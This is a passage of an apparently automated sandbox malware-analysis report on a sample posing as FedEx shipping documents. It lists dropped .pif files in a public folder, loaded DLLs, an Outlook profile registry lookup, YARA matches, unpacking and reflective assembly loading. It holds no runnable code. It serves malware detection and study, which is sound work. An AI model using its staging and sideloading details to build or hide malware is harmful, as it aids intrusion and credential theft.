        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: mssip32.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: mssip32.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: mssip32.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: smartscreenps.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: smartscreenps.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: smartscreenps.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: sppc.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ???.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ???.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ???.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ??l.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ??l.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ?.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ?.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ??l.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ????.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ???e???????????.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ???e???????????.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ?.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ?.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ?.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ?.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ??l.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ??l.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: sppc.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: sppc.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: sppc.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: sppc.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: tquery.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: cryptdll.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: spp.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: vssapi.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: vsstrace.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: spp.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: vssapi.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: vsstrace.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: mssip32.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: endpointdlp.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: endpointdlp.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: endpointdlp.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: endpointdlp.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: advapi.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: advapi.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: advapi.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: advapi.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: advapi.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: advapi.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: advapi.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: spp.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: vssapi.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: vsstrace.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: sppwmi.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: slc.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: sppc.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: sppcext.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: sppc.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: winscard.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: devobj.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: sppc.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: sppc.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: kernel.appcore.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: uxtheme.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: mscoree.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: vcruntime140_clr0400.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: ucrtbase_clr0400.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: ucrtbase_clr0400.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: wldp.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: userenv.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: profapi.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: version.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: msasn1.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: gpapi.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: cryptsp.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: rsaenh.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: cryptbase.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: windows.storage.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: rasapi32.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: rasman.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: rtutils.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: mswsock.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: winhttp.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: ondemandconnroutehelper.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: iphlpapi.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: dhcpcsvc6.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: dhcpcsvc.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: dnsapi.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: winnsi.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: rasadhlp.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: fwpuclnt.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: secur32.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: sspicli.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: schannel.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: mskeyprotect.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: ntasn1.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: ncrypt.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: ncryptsslp.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: dpapi.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: edputil.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: dwrite.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: textshaping.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: windowscodecs.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: textinputframework.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: coreuicomponents.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: coremessaging.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: ntmarta.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: coremessaging.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: wintypes.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: wintypes.dll
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: wintypes.dll
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: version.dll
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: uxtheme.dll
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: url.dll
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifAutomated click: Continue
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeStatic file information: File size 1905664 > 1048576
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x125e00
        Source: Binary string: \??\C:\Windows\System.Windows.Forms.pdb source: hzwdvhxM.pif, 00000007.00000003.1866438603.000000002792E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Windows.Forms.pdb source: hzwdvhxM.pif, 00000007.00000003.1866438603.0000000027956000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3928553785.0000000028AAC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Windows.Forms.pdbt source: hzwdvhxM.pif, 00000007.00000003.1866438603.0000000027956000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3928553785.0000000028AAC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Windows.Forms.pdb/ source: hzwdvhxM.pif, 00000007.00000003.1866438603.000000002792E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ab.Pdb.T`b.# source: hzwdvhxM.pif, 0000000E.00000003.1919890397.000000002E620000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: easinvoker.pdb source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1498803123.0000000020B60000.00000004.00001000.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435295037.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, Mxhvdwzh.PIF, 0000000B.00000002.1593207176.00000000025DF000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.0.dr
        Source: Binary string: _.pdb source: hzwdvhxM.pif, 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: rundll32.pdb source: ndpha.pif, ndpha.pif, 00000009.00000002.1471168514.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, ndpha.pif.8.dr
        Source: Binary string: rundll32.pdbGCTL source: ndpha.pif, 00000009.00000002.1471168514.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, ndpha.pif.8.dr
        Source: Binary string: easinvoker.pdbGCTL source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1446686847.000000000072A000.00000004.00000020.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1498803123.0000000020B60000.00000004.00001000.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1446686847.0000000000759000.00000004.00000020.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435295037.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, Mxhvdwzh.PIF, 0000000B.00000002.1593207176.00000000025DF000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.0.dr

        Data Obfuscation

        barindex
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifUnpacked PE file: 7.2.hzwdvhxM.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifUnpacked PE file: 12.2.hzwdvhxM.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifUnpacked PE file: 14.2.hzwdvhxM.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifUnpacked PE file: 7.2.hzwdvhxM.pif.400000.1.unpack
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifUnpacked PE file: 12.2.hzwdvhxM.pif.400000.2.unpack
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifUnpacked PE file: 14.2.hzwdvhxM.pif.400000.0.unpack
        Source: Yara matchFile source: 0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.228b218.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.2d50000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.228b218.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000002.1464510671.000000000228B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, _.cs.Net Code: ___ System.Reflection.Assembly.Load(byte[])
        Source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, _.cs.Net Code: ___ System.Reflection.Assembly.Load(byte[])
        Source: svchost.pif.0.drStatic PE information: 0xA57E43AD [Tue Dec 25 14:18:21 2057 UTC]
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D63E98 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02D63E98
        Source: NETUTILS.dll.0.drStatic PE information: real checksum: 0x297d1 should be: 0x256e3
        Source: Mxhvdwzh.PIF.0.drStatic PE information: real checksum: 0x0 should be: 0x1dd382
        Source: hzwdvhxM.pif.0.drStatic PE information: real checksum: 0x0 should be: 0x1768a
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeStatic PE information: real checksum: 0x0 should be: 0x1dd382
        Source: svchost.pif.0.drStatic PE information: section name: .imrsiv
        Source: svchost.pif.0.drStatic PE information: section name: .didat
        Source: NETUTILS.dll.0.drStatic PE information: section name: .xdata
        Source: NETUTILS.dll.0.drStatic PE information: section name: /4
        Source: NETUTILS.dll.0.drStatic PE information: section name: /19
        Source: NETUTILS.dll.0.drStatic PE information: section name: /31
        Source: NETUTILS.dll.0.drStatic PE information: section name: /45
        Source: NETUTILS.dll.0.drStatic PE information: section name: /57
        Source: NETUTILS.dll.0.drStatic PE information: section name: /70
        Source: NETUTILS.dll.0.drStatic PE information: section name: /81
        Source: NETUTILS.dll.0.drStatic PE information: section name: /92
        Source: ndpha.pif.8.drStatic PE information: section name: .didat
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D762A4 push 02D7630Fh; ret 0_2_02D76307
